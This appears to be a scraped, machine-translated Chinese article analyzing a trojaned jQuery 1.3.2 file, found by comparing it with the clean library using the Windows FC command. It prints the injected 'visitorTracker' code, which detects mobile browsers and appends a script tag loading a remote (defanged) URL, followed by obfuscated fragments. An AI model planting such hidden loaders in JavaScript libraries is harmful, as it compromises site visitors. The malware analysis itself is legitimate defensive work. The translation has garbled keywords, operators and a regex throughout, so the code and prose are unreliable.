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2025-03-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >


Shulou( Report--

External link address: hXXp://

Use the window FC command to compare normal files with unlinked web pages

Comparing file C:\ USERS\ AT\ DESKTOP\ jquery-1.3.2.min.js with C:\ USERS\ AT\ DESKTOP\ JS [infored]\ JQUERY-1.3.2.MIN (2) .js

* C:\ USERS\ AT\ DESKTOP\ JS [infored]\ jquery-1.3.2.min.js


JQuery JavaScript Library v1.3.2

* C:\ USERS\ AT\ DESKTOP\ JS [infored]\ JQUERY-1.3.2.MIN (2) .JS

/ visitorTracker*/

Var visanalyzerin = setInterval (function () {

If (document.body! = null & & typeof document.body! = "undefined") {

ClearInterval (visanalyzerin)

If (typeof window ["globalvisitor"] = = "undefined") {

Window ["globalvisitor"] = 1

Var isIE = visanalyzerde ()

Var isChrome =! isIE & &!! & & window.navigator.vendor = = "Google Inc."

If (visanalyzer_isMob ()) {

Var visanalyzervs = document.createElement ("script"); visanalyzervs.src = "hXXp://"; document.getElementsByTagName ("head") [0] .appendChild (visanalyzervs)

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Var visanalyzervs = document.createElement ("script"); visanalyzervs.src = "hXXp://"; document.getElementsByTagName ("head") [0] .appendChild (visanalyzervs)




Visitortracksdel ()


}, 100)

Function visitortracksdel () {

/ / return

Var curscid = "none"

If (curscid! = "none") {

Var csr = document.getElementById (curscid)

If (typeof csr! = undefined & & csr! = null) {

Csr.outerHTML = ""

Delete csr




Function visanalyzerde () {

Var ua = window.navigator.userAgent

Var msie = ua.indexOf ("MSIE")

If (msie > 0) {

Return parseInt (ua.substring (msie + 5, ua.indexOf (".", msie)), 10)


Var trident = ua.indexOf ("Trident/")

If (trident > 0) {

Var rv = ua.indexOf ("rv:")

Return parseInt (ua.substring (rv + 3, ua.indexOf (., rv)), 10)


Var edge = ua.indexOf ("Edge/")

If (edge > 0) {

Return parseInt (ua.substring (edge + 5, ua.indexOf (".", edge)), 10)


Return false


Function visanalyzerisMob () {

Var ua = window.navigator.userAgent.toLowerCase ()

If (/ (android | bb\ d+ | meego). + mobile | avantgo | bada\ / | blackberry | blazer | compal | elaine | fennec | hiptop | iemobile | ip (hone | od) | iri

S | kindle | lge | maemo | midp | mmp | mobile.+firefox | netfront | opera m (ob | in) I | palm (os)? | phone | p (ixi | re)\ / | plucker | pocket | psp | series (4 |

6) 0 | symbian | treo | up. (browser | link) | vodafone | wap | windows ce | xda | xiino/i.test (ua) | | / 1207 | 6310 | 6590 | 3gso | 4thp | 50 [1-6] I | 770s | 802s |

A wa | abac | ac (er | oo | s -) | ai (ko | rn) | al (av | ca | co) | amoi | an (ex | ny | yw) | aptu | ar (ch | go) | as (te | us) | attw | au (di |-m | r | s) | avan | be (ck | ll | n)

Q) | bi (lb | rd) | bl (ac | az) | br (e | v) w | bumb | bw- (n | u) | c55\ / | capi | ccwa | cdm- | chtm | cldc | cmd- | co (mp | nd) | craw | da (it | ll | ng) | dbte | dc-

S | devi | dica | dmob | do (c | p) o | ds (12 |-d) | el (49 | ai) | em (L2 | ul) | er (ic | K0) | esl8 | ez ([4-7] 0 | os | wa | ze) | fetc | fly (- |) | G1 u | g560 | gene | gf-5

| | g-mo | go (.w | od) | gr (ad | un) | haie | hcit | hd- (m | p | t) | hei- | hi (pt | ta) | hp (I | ip) | hs-c | ht (c (- | _ | a | g | p | s | t) | tp) | hu (aw | tc) | i20 | g |

O | ma) | i230 | iac (|-|\ /) | ibro | idea | ig01 | ikom | im1k | inno | ipaq | iris | ja (t | v) a | jbro | jemu | kddi | keji | kgt (|\ /) | klon | kpt | kwc- | kyo

(C | k) | le (no | xi) | lg (g |\ / (k | l | u) | 50 | 54 |-[aripw]) | libw | lynx | M1 Maiw | m3ga | M50\ / | ma (te | ui | xo) | mc (01 | 21 | ca) | m-cr | me (rc | ri) | mi (O8 | oa | ts)

) | mmef | mo (01 | 02 | bi | de | do | t (- | o | v) | zz) | mt (50 | p1 | v) | mwbp | mywa | n10 [0-2] | N20 [2-3] | n30 (0 | 2) | n50 (0 | 2 | 5) | N7 (0 (0 | 1) | 10) | ne ((c | m)-| |

On | tf | wf | wg | wt) | nok (6 | I) | nzph | o2im | op (ti | wv) | oran | owg1 | p800 | pan (a | d | t) | pdxg | pg (13 |-([1-8] | c)) | phil | pire | pl (ay | uc) | pn-2 | po (ck |

Rt | se) | prox | psio | pt-g | qa-a | qc (07 | 12 | 21 | 32 | 60 |-[2-7] | I -) | qtek | R380 | R600 | raks | ro (ve | zo) | s55\ / | sa (ge | ma | mm | ms | ny | va) | sc (0)

| 1 | h-| oo | p -) | sdk\ / | se (c (- | 0 | 1) | 47 | mc | nd | ri) | sgh- | shar | sie (- | m) | sk-0 | sl (45 | id) | sm (al | ar | b3 | it | T5) | so (ft | ny) | sp (01 | h-| v-| v)

) | sy (01 | mb) | T2 (18 | 50) | T2 (00 | 10 | 18) | ta (gt | lk) | tcl- | tdg- | tel (I | m) | tim- | t-mo | to (pl | sh) | ts (70 | m-| m3 | M5) | tx-9 | up (.b | G1 | si) | u

Tst | v400 | v750 | veri | vi (rg | te) | vk (40 | 5 [0-3] |-v) | vm40 | voda | vulc | vx (52 | 53 | 60 | 61 | 70 | 81 | 83 | 85 | 98) | W3C (- |) | webc | whit | wi (g | nc | nw)

) | wmlb | wonu | x700 | yas- | your | zeto | zte-/i.test (ua.substr (0heli4) {

Return true


Return false

} / visitorTracker//*

JQuery JavaScript Library v1.3.2

C:\ USERS\ AT\ DESKTOP\ JS [included]\ jquery-1.3.2.min.js

Roll "+ G], document.body [" offset "+ G], document.documentElement [" offset "+ G]): this.length?o.css (this [0], J): null): this.css

Ypeof Knights = "string"? KRV KV + "px")})}) ()

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Roll "+ G], document.body [" offset "+ G], document.documentElement [" offset "+ G]): this.length?o.css (this [0], J): null): this.css

Ypeof Knights = "string"? KRV KV + "px")})}) ()

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Nt [_ 0xdc56 [21]] _ 0xdc56 [20];};}

/ ceaac6f63aa22c2d228fa77b762e3461/

Hexadecimal conversion result:

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